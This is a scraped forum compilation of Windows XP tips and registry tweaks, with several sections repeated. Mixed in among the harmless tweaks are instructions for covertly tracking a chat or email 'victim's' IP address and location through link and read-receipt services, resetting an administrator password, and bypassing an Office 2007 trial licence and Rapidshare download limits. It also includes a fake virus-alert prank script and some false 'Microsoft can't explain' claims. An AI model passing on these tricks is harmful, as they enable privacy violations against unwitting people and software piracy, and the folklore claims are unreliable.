now u will see two tabs in next window
one is for source cd and another is destination
change the destination cd to image drive
and hit burn
u r done!!!!
28. Some Hidden XP Programs.
Programs :
1. Private Character Editor :
Used for editing fonts,etc.
start-->Run-->Now, type eudcedit
tool for designing your own fonts, logos and icons.
2. Dr. Watson :
This an inbuilt windows repairing software !
start-->Run
-->Now, type drwtsn32
3. Media Player 5.1 :
Even if you upgrade your Media Player, you can still access your old player.
start-->Run-->Now, type mplay32
4. iExpress :
Used to create SetupsYou can create your own installers !
start-->Run--> Now, type iexpress
29.Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.
So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...
Type
FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]
Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".
30.10 Tips for xp user
1] If you see a 'virtual memory low' message then increase its virtual memory. To increase virtual memory,
Go to My Computer->Properties->Advanced->Performa
nce Settings->Advanced->Virtual Memory->Change->Select the appropriate drive->Custom size->set appropriate level(our it is 600(min.) & 700(max.)->Ok.
2] Increase 'Visual Performance'. Go to My Computer->Properties->Advanced->Performance Settings->Visual Settings->Custom->Select only the following options.
a)Slide taskbar buttons.
b)Smooth edges of screen fonts.
c)Smooth-scroll list boxes.
d)Use a background image for each folder type.
e)Use visual style on windows and buttons.
3] Don't keep unwanted/extra fonts. To remove extra fonts, Go to Start->Settings->Control Panel->Fonts.
4] Your Desktop Wallpaper & Screensaver consume a large amount of disk space. Select the 'None' option for both wallpapers & Screensavers.
5] Avoid keeping DEMO Games.
6] Uninstall the unwanted Softwares.
7] Use Registry Cleaner to keep your registry clean.Uniblue registry booster is best.
8] Try to keep Music and pictures files in the folder specified by windows itself.
9]Use Hybernating Option for Quick windows start. To active Hybernating follow the following steps.
Desktop->Properties->Screensaver->Power->Hybernating->Enable Hybernating->Ok.
10] Keep your Dektop clean with unwanted icons.Run desktop cleanup wizard.
5 more tips for xp user
1] In BIOS, Select first booting device as your HDD.
2] Keep deleting your Temporary Internet Files in regular intervals.
Go to Windows Drive (c: or d:)->Select the User->Local Settings->Temporary Internet Files.Also
Empty your browser's cache in regular intervals.
3] Setting Priority High for a particular program.
Open Task Manager->Processes->Select the desired Program->Right Click->Set Priority->High->Ok.
This Priority set if for current session.
4] Disable Yahoo Messenger, Google Talk, and other unwanted programs from startup.Run-->msconfig-->startup tab-->uncheck undesired services ad restart to take affect.
5]Use Intel Application Accelerator to speed up your disk access,& speed up your disk access
To disable the display of local or networked drives when you click My
Computer go to : HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion
\Policies\Explorer
Now in the right pane create a new DWORD item and name it
NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal)
Now press F5 to refresh. When you click on My Computer, no drives
will be shown. To enable display of drives in My Computer, simply
delete this DWORD item. It's .reg file is as follows:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersio
n\Policies\Explorer]
"NoDrives"=dword:03ffffff
2.Pop a banner each time Windows Boots
To pop a banner which can contain any message you want to
display just before a user is going to log on, go to the key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndows\CurrentVers
ion\WinLogon
Now create a new string Value in the right pane named
LegalNoticeCaption and enter the value that you want to see in the
Menu Bar. Now create yet another new string value and name it:
LegalNoticeText. Modify it and insert the message you want to
display each time Windows boots. This can be effectively used to
display the company's private policy each time the user logs on to
his NT box. It's .reg file would be: REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVer
sion\Winlogon]
"LegalNoticeCaption"="Caption here."
3.Customizing the Right Click Context Menu of the Start Menu
When you right click on the start menu, only 3 options pop up:
Open, Explore, and Find. You can add your own programs to this
pop up menu( which comes up when we right click on it.) Open
Regedit and go to the following registry key:
HKEY_CLASSES_ROOT\Directory\Shell
Right click on the shell and create a new Sub Key (You can create a
new SubKey by right clicking on the Shell Key and selecting New >
Key.). Type in the name of the application you want to add to the
start menu. I want to add Notepad to the Start Menu and hence I
name this new sub key, Notepad. Now right click on the new
registry key that you just created and create yet another new key
named Command. Enter the full path of the application, in this case
Notepad in the default value of Command in the right
pane. So I Modify the value of the default string value and enter the
full pathname of Notepad:
c:\wndows\notepad.exe.
Now press F5 to refresh. Now if you right click on the Start Button
you will find a new addition to the Pop Up Menu called Notepad.
4.There is away of accessing restricted
folders.DOS has a lovely command known
as START. Its general syntax is:
START application_path
It does do what it seems to do, start applications. So in you have
access to DOS then you can type in the START command to get
access to the restricted folder.
5. In Windows you can
create shortcuts to almost anything from a file, folder to a Web
URL.
c:\windows\system folder and you need to access it. What do you
do? Simply create a Shortcut to it. To do this right click anywhere
on the desktop and select New > Shortcut. A new window titled
Create Shortcut pops up. Type in the path of the restricted folder
you wish to access, in this case c:\windows\system. Click Next,
Enter the friendly name of the Shortcut and then click Finish. Now
you can access the restricted folder by simply double clicking on the shortcut icon
6.Colorful Background
Don't like the boring background colors of Outlook Express? To
change it launch the Windows Registry Editor and scroll down to the
HKEY_CURRENT_USER\Software\Microsoft\Int
ernet Mail And News
key.
On the left pane, click on ColorCycle or select Edit and Modify in the
menu. Now change the value to 1. Close and restart. Now, launch
Outlook Express and whenever you open up a New Message, hold
down ctrl-shift and tap the z key to scroll to change the background
color. Repeat the keystroke to cycle through the colors.
7.Deleting System Options from the Start menu
You can actually remove the Find and Run options from the start
menu by performing a simple registry hack. Again like always
Launch the registry editor and scroll down to the below key:
HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion
\Policies\Explorer
Right-click on the right pane and select New, DWORD Value. Name
it NoFind.(To remove the RUN option name it NoRun). Double-click
the newly create DWORD to edit it's value and enter 1 as its value.
This will disable the FIND option of the Start Menu and will also
disable the default Shortcut key(F3 for Find.)
8.Object Class identifier
Shell folders(CLSID)
ActiveX Cache {88C6C381-2E85-11D0-94DE-444553540000}
Computer Search Results {1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}
History {FF393560-C2A7-11CF-BFF4-444553540000}
Internet Explorer {871C5380-42A0-1069-A2EA-08002B30309D}
My Computer {20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents {450D8FBA-AD25-11D0-98A8-0800361B1103}
My Network Places {208D2C60-3AEA-1069-A2D7-08002B30309D}
Offline Files {AFDB1F70-2A4C-11D2-9039-00C04F8EEB3E}
Programs {7BE9D83C-A729-4D97-B5A7-1B7313C39E0A}
Recycle Bin {645FF040-5081-101B-9F08-00AA002F954E}
Search Results {E17D4FC0-5564-11D1-83F2-00A0C90DC849}
Shared Documents {59031A47-3F72-44A7-89C5-5595FE6B30EE}
Start Menu {48E7CAAB-B918-4E58-A94D-505519C795DC}
Temporary Internet Files {7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Web {BDEADF00-C265-11D0-BCED-00A0C90AB50F}
Control Panel folders
Administrative Tools {D20EA4E1-3957-11D2-A40B-0C5020524153}
Fonts {D20EA4E1-3957-11D2-A40B-0C5020524152}
Network Connections {7007ACC7-3202-11D1-AAD2-00805FC1270E}
Printers and Faxes {2227A280-3AEA-1069-A2DE-08002B30309D}
Scanners and Cameras {E211B736-43FD-11D1-9EFB-0000F8757FCD}
Scheduled Tasks {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Control Panel icons
Folder Options {6DFD7C5C-2451-11D3-A299-00C04F8EF6AF}
Taskbar and Start Menu {0DF44EAA-FF21-4412-828E-260A8728E7F1}
User Accounts {7A9D77BD-5403-11D2-8785-2E0420524153}
Add Network Places {D4480A50-BA28-11D1-8E75-00C04FA31A86}
Briefcase {85BBD920-42A0-1069-A2E4-08002B30309D}
E-mail {2559A1F5-21D7-11D4-BDAF-00C04F60B9F0}
Help and Support {2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
Internet {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0}
Network Setup Wizard {2728520D-1EC8-4C68-A551-316B684C4EA7}
Run {2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
Search {2559A1F0-21D7-11D4-BDAF-00C04F60B9F0}
Windows Security {2559A1F2-21D7-11D4-BDAF-00C04F60B9F0}
To restore the Run or find command modify the value of the
DWORD to 0 or simply Delete the DWORD value.
9.Some users don't like having to log on to Windows XP. When they restart the computer, they want it
to boot all the way to the desktop without stopping at the Log On To Windows dialog box along the
way.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon is where you configure the
ability to log on to Windows XP automatically. First you set the REG_SZ value AutoAdminLogon to
1, which turns on this feature. Just remember that this is a REG_SZ value and not a REG_DWORD
value. Next set the values DefaultUserName and DefaultPassword to the user name and password
that you want to use to log on to the operating system. Both are REG_SZ values. Last, set the
REG_SZ value DefaultDomainName to the name of the domain that's authenticating your name and
password. Table below summarizes these values, which you create if they don't already exist.
Table ANJALI: Values in Winlogon
Name Type Data
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
AutoAdminLogon REG_SZ 0 | 1
DefaultUserName REG_SZ Name
DefaultDomainName REG_SZ Domain
DefaultPassword REG_SZ Password
10.change ur processor name
Trick - SHOW YOUR PC PENTIUM 5,6....OR MORE...
GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISC
RIPTION>
SYSTEM>CENTRAL PROCESSOR>
ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX
1.Change the name of your internet explorer
Change The Title Of Internet Explorer
Customize ur Internet Explorer
1. Open Registry Editor
2. Move to the following key.
3. HKEY_CURRENT_USER\Software\Microsoft\Int
ernet. Explorer\Main.
4. In the Right Panel look for the string "Window Title" and change its value as u wish. If the String value is not there create a New String value and assign the value as your wish.
12.Make your start menu to work 100% faster.
step1 : press windows key+ r
step2: type regedit on the run box
step3: select HKEY_CURRENT_USER
step4: below this select the Control panel
step5: Choose Desktop
step 6: in the right window you can able to see this MenuShowDelay click this and change the 400 value to 0 thats it
step 7: Restart your computer
13.Convert Trail to Full Office 07
follow these steps...
start -> run .. type regedit ->HKEY_LOCAL_MACHINE -> software -> microsoft -> office -> 12.0 ->
registration -> (clik on the first number series) -> now select (DigitalProductID,LicenseType,TrialType)
and press 'del' key to delete them and then exit registry....
now open C:\Program Files\Common Files\Microsoft Shared\Office12\Office Setup Controller\Proof.en ...
now open the Proof file(XML Document) in it with NOTEPAD ....
now under the last line u wil find ....
now replace "" with "neverinstalled" ...(including the inverted commas
too)....
pls be careful while editing them...
14.Renaming The Start Button:
To rename the start button, you will need a hex editor.(ultraEdit)
Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)
With the hex editor, open that file and go to offset 412b6
You will see the word start with blanks between each letter
Edit it be any 5 characters or less
Save the file
Boot to DOS
Copy the existing c:\windows\explorer.exe to explorer.org
Copy explorer_1.exe to explorer.exe
You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one.
Note: If the partition is NTFS and you can't access the files from DOS:
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
Change the value of Shell from Explorer.exe to explorer_1.exe.
15.Removing the Recycle Bin from the Desktop:
If you don't use the Recycle Bin to store deleted files , you can get rid of its desktop icon all together. Run Regedit and go to:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Wi
ndows/CurrentVersion/explorer/Desktop/NameSpace
16.Adding Administrative Tools Icon To The Desktop:
Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Desktop\NameSpace . Create the following key: {D20EA4E1-3957-11d2-A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor.
17. HIDE ALL DESKTOP ICONS
HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\Explorer
NoDesktop (DWORD value):
Set to 1 to hide all icons.
Delete NoDesktop to undo.
Hit F5 to refresh the desktop.
Hide Network Neighborhood, My Network Places (9x)
Run Poledit.exe (You may have to install it: It is on your Windows CD in\tools\reskit\netadmin\poledit).
File > Open Registry > (double click) Local User > Shell > Restrictions
Check Hide Network Neighborhood or/and My Network Places
OK > File > Save
Reboot.
18.Open g-talk as much as u wish in single pc and chat with different login.
Just follow the simple steps Below:
1)Right click on the Google Talk shortcut.
2)click on Properties.
3)Go to Shortcut tab on Google Talk Properties window.
4)On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).“c:\program files\google\google talk\googletalk.exe” /nomutex
5)Click on OK.
19.GMail drive.. Chk it out.. Things you need to have:
1) gmail account
Download Gmail Drive from
Code:
http://www.softpedia.com/progDownload/GMail-Drive-shell-extension-Download-15944.html
ii) Install the software.
iii) After installing, a drive named gmail drive will be created in My Computer .
iv) double click on this drive, login to gmail account.
v) Whatever content you copy to this drive will be sent to your mail account as attachment, you have logged in
20.the below steps to format pen drive in NTFS File System.
a. Insert USB drive in your PC
b. Goto Device Manager
c. Select Disk Drives and expand
d. Right Click on USB drive and select Properties
e. Goto policies tab and select Optimize for performance and press OK
f. Open My Computer, Click on USB Drive and select Format Opton
Now you can have NTFS option there.
or do the following:
1. Go to Start ->Run -> cmd and press enter.
2. Type convert X: /FS:NTFS ( Where X is your Pen Drive Letter)
The File System is now converted to NTFS. Now its time to enable compression:
1. Go to My Computer and Right Click on your Pen Drive Icon and select Properties.
2. Select Compress Drive to Save Disk Space and then OK.
3. Then Select Apply To Sub Folders and Files and select ok ( if Asked)
All Done, the free space of the pen drive will increase and if you copy anything in the drive it will take less space.
21.Some Important Run commands ...
directly open 'Run' by pressing Windows+R keys at a time.
command - to run MS - DOS (.com, .pif)
calc - to run calculator (.exe)
control - to open Control Panel (.exe)
defrag - to defrag the hard disk drives (.exe)
dialer - for dialing seups (.exe)
dosprompt - to get a minimized DOS window (.pif)
explorer - to open Windows Explorer (.exe., .scf)
ftp - for File Transfer Protocol if internet is connected (.exe)
ms-dos~1/ms-dos~2 - for fully MS-DOS mode.
No Windows O.S. (.pif)net - for net information cum help (.exe)
ping - for bytes information and bandwidth of internet connection information (.exe)
regedit - to open Registry (.exe)
telnet - command runner if the system is conncected in a UNIX system network (.exe)
tuneup - for Task Scheduling wizard, i.e. Task Maintanance (.exe)
notepad - to run Notepad (.exe)
write - to run Wordpad (.exe)
scanregw - to scan the Registry and to backup it (.exe)
progman - to maintain, run and view the files in all drives (.exe)
directcc - to join your computer in cable conncetion with other computers (.exe)
scandskw - to open Scandisk to scan the hard drives (.exe)
winfile - Windows File Managertaskman - to manage current running open programs or files.Nice replacement for default Windows taskbar
msconfig - to maintain the configuration of computer. It will show the options like General, Startup including files Autoexec.bat, Config.sys, System.ini and Win.ini. (Autoexec.bat & Config.sys are MS-DOS files)
winrep - to run Windows Report Tool - Accessories>System Tools>System Information (.exe)winver - to know the version of Windowspackager - insert objects in documets, presentations or worksheets
winfile - another Windows Explorer (.exe)
clipbook - a simple utility that allws you to save and recall several pages or graphics. (.exe)sysedit - view or edit system files from within one window (.exe)
22.CREATE A FOLDER WITHOUT ANY NAME & without icon totally invisible
create a folder without any name...
just type these codes while renaming the folder n press enter once...
alt+0160
OR
alt+255
Now time to hide the folder, to hide a folder first select the folder then right click and go to properties, in properties select the change icon option ...now u can c a lot of folder icon.(C:\Windows\system32\imageres.dll).
.u look for a blank icon select any of the 3 blank icon. click ok then apply u will c invisible folder...(now with no name and no icon too..secret)
23.TRACKING IN YAHOO WHILE CHATTING CHECK THIS OUT
TRACKING IN YAHOO WHILE CHATTING CHECK THIS OUT
TRACK WHILE CHATTING IN YAHOOOOOO
Hear is the tric
1)open this link
Code:
http://shivampatel.net/trace
2)type ur id on the text box give
3)open ur yahoo id u will get a mail regarding this……
4)while chatting in yahoo send this link
Code:
http://acmepeers.com/?u=omo
to the target and allow them to click it
5)PERSON TRACKED…u will get mail regarding country ,city,latitude longtidue, IP ADDRESS,about his system…
24.To use USB Pendrive as RAM in Vista:
Connect the Pendrive to the Computer.
Right click on the Drive and select Properties.
Go to Readyboost tab. There you can see the options for using it as Ram.
25.TRICK THAT INFORMS U THAT CAPSLOCK KEY IS ON
it will alert you when your finger taps the Caps Lock key?
With this tip, I'll show you how to make your computer beep & flash the next time it happens.
The first thing you need to do is get the computer to beep when you hit the Caps Lock key. Here's how:
1. Click the Start button, Settings, Control Panel (XP Users, hit the Start button, Control Panel). Open the Accessibility Options Icon.
2. On the Keyboard tab, click the "Use Toggle Keys" checkbox.
That's it for the beeping part. (OK )
Next, we need to get your screen to flash you, err, flash at you.
HOW TO DO THIS
1. From the Accessibility Options screen, click the Sound tab and check the "Use SoundSentry" checkbox.
2. Next click the Settings button and select "Flash active window" from the "Warning for windowed programs" drop down box.
That's it. Hit OK until you're clear of property and settings screens.
TO SEE IT WORKING
Open your favorite word processor and hit your Caps Lock key.
26.format your computer via your hdd
the limitation is that u should have a OS previously installed and u can't format c drive except from it u can format all other drives
make a image of your xp sp2 in your hdd or borrow it from someone in your pen drive and mount this image via demon tool,alchohal, clone cd or any other virtual drive
now double click it
a windows appears and ask u what do u want to do
select install windows xp professional/home edition
now a new windows open in that click next and it will ask for key
give the key
click next
now a option comes copy files in here click copy files in hard disk
now press next
it will start copying file in your hdd
and restart the windows
now follow the normal procedure
and now u can format your any drive (if it has OS also u can format)
27.how to make image
use nero to make image or you can also use any iso maker
or use alchohal,clone cd etc
to make image via nero insert your disk and open nero
go to backup tab and choose copy cd
now u will see two tabs in next window
one is for source cd and another is destination
change the destination cd to image drive
and hit burn
u r done!!!!
28. Some Hidden XP Programs.
Programs :
1. Private Character Editor :
Used for editing fonts,etc.
start-->Run-->Now, type eudcedit
tool for designing your own fonts, logos and icons.
2. Dr. Watson :
This an inbuilt windows repairing software !
start-->Run
-->Now, type drwtsn32
3. Media Player 5.1 :
Even if you upgrade your Media Player, you can still access your old player.
start-->Run-->Now, type mplay32
4. iExpress :
Used to create SetupsYou can create your own installers !
start-->Run--> Now, type iexpress
29.Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.
So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...
Type
FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]
Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".
30.10 Tips for xp user
1] If you see a 'virtual memory low' message then increase its virtual memory. To increase virtual memory,
Go to My Computer->Properties->Advanced->Performa
nce Settings->Advanced->Virtual Memory->Change->Select the appropriate drive->Custom size->set appropriate level(our it is 600(min.) & 700(max.)->Ok.
2] Increase 'Visual Performance'. Go to My Computer->Properties->Advanced->Performance Settings->Visual Settings->Custom->Select only the following options.
a)Slide taskbar buttons.
b)Smooth edges of screen fonts.
c)Smooth-scroll list boxes.
d)Use a background image for each folder type.
e)Use visual style on windows and buttons.
3] Don't keep unwanted/extra fonts. To remove extra fonts, Go to Start->Settings->Control Panel->Fonts.
4] Your Desktop Wallpaper & Screensaver consume a large amount of disk space. Select the 'None' option for both wallpapers & Screensavers.
5] Avoid keeping DEMO Games.
6] Uninstall the unwanted Softwares.
7] Use Registry Cleaner to keep your registry clean.Uniblue registry booster is best.
8] Try to keep Music and pictures files in the folder specified by windows itself.
9]Use Hybernating Option for Quick windows start. To active Hybernating follow the following steps.
Desktop->Properties->Screensaver->Power->Hybernating->Enable Hybernating->Ok.
10] Keep your Dektop clean with unwanted icons.Run desktop cleanup wizard.
5 more tips for xp user
1] In BIOS, Select first booting device as your HDD.
2] Keep deleting your Temporary Internet Files in regular intervals.
Go to Windows Drive (c: or d:)->Select the User->Local Settings->Temporary Internet Files.Also
Empty your browser's cache in regular intervals.
3] Setting Priority High for a particular program.
Open Task Manager->Processes->Select the desired Program->Right Click->Set Priority->High->Ok.
This Priority set if for current session.
4] Disable Yahoo Messenger, Google Talk, and other unwanted programs from startup.Run-->msconfig-->startup tab-->uncheck undesired services ad restart to take affect.
5]Use Intel Application Accelerator to speed up your disk access,& speed up your disk access
Hide files in a jpg
How to:
Hide files in a jpg
Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you're done!
A quick info-fact:
With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar.
With this technique the Al-Qaeda operatives were able to send info to others secretively
__________________
Hide files in a jpg
Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you're done!
A quick info-fact:
With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar.
With this technique the Al-Qaeda operatives were able to send info to others secretively
__________________
Three things that even Microsoft can't explain!
MAGIC #1
An Indian found that nobody can create a FOLDER anywhere on the Computer which can be named as "CON". This is something funny and inexplicable… At Microsoft the whole Team, couldn't answer why this happened!
TRY IT NOW, IT WILL NOT CREATE A "CON" FOLDER
MAGIC #2
For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
Noticed the weird bug? No one can explain!
MAGIC #3
Again this is something funny and can't be explained… At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian. Try it out yourself…
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER
And see the magic…..!
__________________
An Indian found that nobody can create a FOLDER anywhere on the Computer which can be named as "CON". This is something funny and inexplicable… At Microsoft the whole Team, couldn't answer why this happened!
TRY IT NOW, IT WILL NOT CREATE A "CON" FOLDER
MAGIC #2
For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
Noticed the weird bug? No one can explain!
MAGIC #3
Again this is something funny and can't be explained… At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian. Try it out yourself…
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER
And see the magic…..!
__________________
get admin pass easy way!!!
1.type compmgmt.msc in RUN field.
2.Go to LOCAL USERS AND GROUPS.
3.In That go to USERS field.
4.Right click on ADMINISTRATOR and SET PASSWORD.
Note: all documents folders will get deleted so better make a copy of it somewhere else.
ENJOY!!!!!!!!!!!!!
__________________
2.Go to LOCAL USERS AND GROUPS.
3.In That go to USERS field.
4.Right click on ADMINISTRATOR and SET PASSWORD.
Note: all documents folders will get deleted so better make a copy of it somewhere else.
ENJOY!!!!!!!!!!!!!
__________________
Automatically Close the "Non Responding" program! , Simple !
When an application fails to respond during shutdown a dialog box is displayed prompting the user to either end it now or to wait. Enabling the value AutoEndTasks will take care of the non-responding application without user intervention.
This is how to do it
To Implement for All Users
[Start] [Run] [Regedit]
Registry Key: HKEY_USERS\.DEFAULT\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
To Implement for Individual Users
[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
__________________
This is how to do it
To Implement for All Users
[Start] [Run] [Regedit]
Registry Key: HKEY_USERS\.DEFAULT\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
To Implement for Individual Users
[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
__________________
Scare your friends 100% working
step 1. Open up notepad
step 2. Type
lol=msgbox("whatever you want message to say",20,"whatever you want the window to be titled")
ex:
Lol=msgbox("warning your computer has been infected by a virus ",20,"virus alert")
step 3. Save the text as whateveryouwant.vbs
the number 20 represents the type of window style the message will be in. You can experiment with different styles you want.
Don't worry it's safe.. this is just for fun...
__________________
step 2. Type
lol=msgbox("whatever you want message to say",20,"whatever you want the window to be titled")
ex:
Lol=msgbox("warning your computer has been infected by a virus ",20,"virus alert")
step 3. Save the text as whateveryouwant.vbs
the number 20 represents the type of window style the message will be in. You can experiment with different styles you want.
Don't worry it's safe.. this is just for fun...
__________________
How to exceed your download limit on Rapidshare/Others
NOTE: complicated, and yes there are proxy sites to get around rapidshare, however there are none currently that'll get around rapidshare.com:
Okay, here is a quick tutorial on how to get around those annoying "Wait X minutes before downloading" messages, as well as the one-file-at-a-time limits that are frequent on Rapidshare and similar sites. This tutorial uses Opera (because it has the best download manager), but can probably be adapted for any browser
Step 1. Since this will slow down each download quite a bit, pick 4 or 5 Rapidshares that you've always wanted. This will give you the most speed boost.
Step 2. Start the biggest one as you normally would, by clicking the "Free" button.
Step 3. Go to
Code:
http://www.samair.ru/proxy/
and pick a proxy. configure your browser to use it. (In Opera, Tools/Preferences, Advanced tab, Network on the right, then click the Proxy Servers button.
Before the colon is the IP, after is the port.
Step 4: Finally, test it for speed. If the proxy seems pretty fast, start the next download, and repeat Step 3&4 until you have all your files downloading. If it seems too slow, repeat step 3 until you find a fast one.
That's all! Most of you will already know about this, but it's cool anyways.
__________________
Okay, here is a quick tutorial on how to get around those annoying "Wait X minutes before downloading" messages, as well as the one-file-at-a-time limits that are frequent on Rapidshare and similar sites. This tutorial uses Opera (because it has the best download manager), but can probably be adapted for any browser
Step 1. Since this will slow down each download quite a bit, pick 4 or 5 Rapidshares that you've always wanted. This will give you the most speed boost.
Step 2. Start the biggest one as you normally would, by clicking the "Free" button.
Step 3. Go to
Code:
http://www.samair.ru/proxy/
and pick a proxy. configure your browser to use it. (In Opera, Tools/Preferences, Advanced tab, Network on the right, then click the Proxy Servers button.
Before the colon is the IP, after is the port.
Step 4: Finally, test it for speed. If the proxy seems pretty fast, start the next download, and repeat Step 3&4 until you have all your files downloading. If it seems too slow, repeat step 3 until you find a fast one.
That's all! Most of you will already know about this, but it's cool anyways.
__________________
How To Find Passwords Of Rar Files
here it is,
lets pretend this is the link,
but you dont know the pass;
Code:
http://rapidshare.com/files/138943935/pipo_AB_O_08.rar
make it to;
Code:
/files/138943935/pipo_AB_O_08.rar
or;
Code:
138943935/pipo_AB_O_08.rar
and search that on google,
most of the times you can find the pass which is in this case;
Code:
pipo1961
i hope this makes clear how to find passwords of downloaded files.
__________________
lets pretend this is the link,
but you dont know the pass;
Code:
http://rapidshare.com/files/138943935/pipo_AB_O_08.rar
make it to;
Code:
/files/138943935/pipo_AB_O_08.rar
or;
Code:
138943935/pipo_AB_O_08.rar
and search that on google,
most of the times you can find the pass which is in this case;
Code:
pipo1961
i hope this makes clear how to find passwords of downloaded files.
__________________
Track anyone Just by sending mail......
Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings.... all u have to do is get his e-mail id...
Once u have it.
Go to
Code:
http://www.readnotify.com
register there...
Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com
But before sending the mail just add ".readnotify.com" with the victims id.. for example
xxxxx@yahoo.com.readnotify.com
and then send it...
when ever victim opens it his all the info will be mailed to u.
which can b very useful for the hackers.
Note = U can also change the settings in
Code:
www.readnotify.com
__________________
Find IP Address in GMail
1. Log into your Gmail account and open the mail.
2. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
3. You should get headers like this:
Gmail headers : Vinayak
Look for Received: from followed by a few hostnames and an IP address between square brackets. That is be the IP address of the sender!
4. Track the IP address of the sender
__________________
Find IP address in Yahoo Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
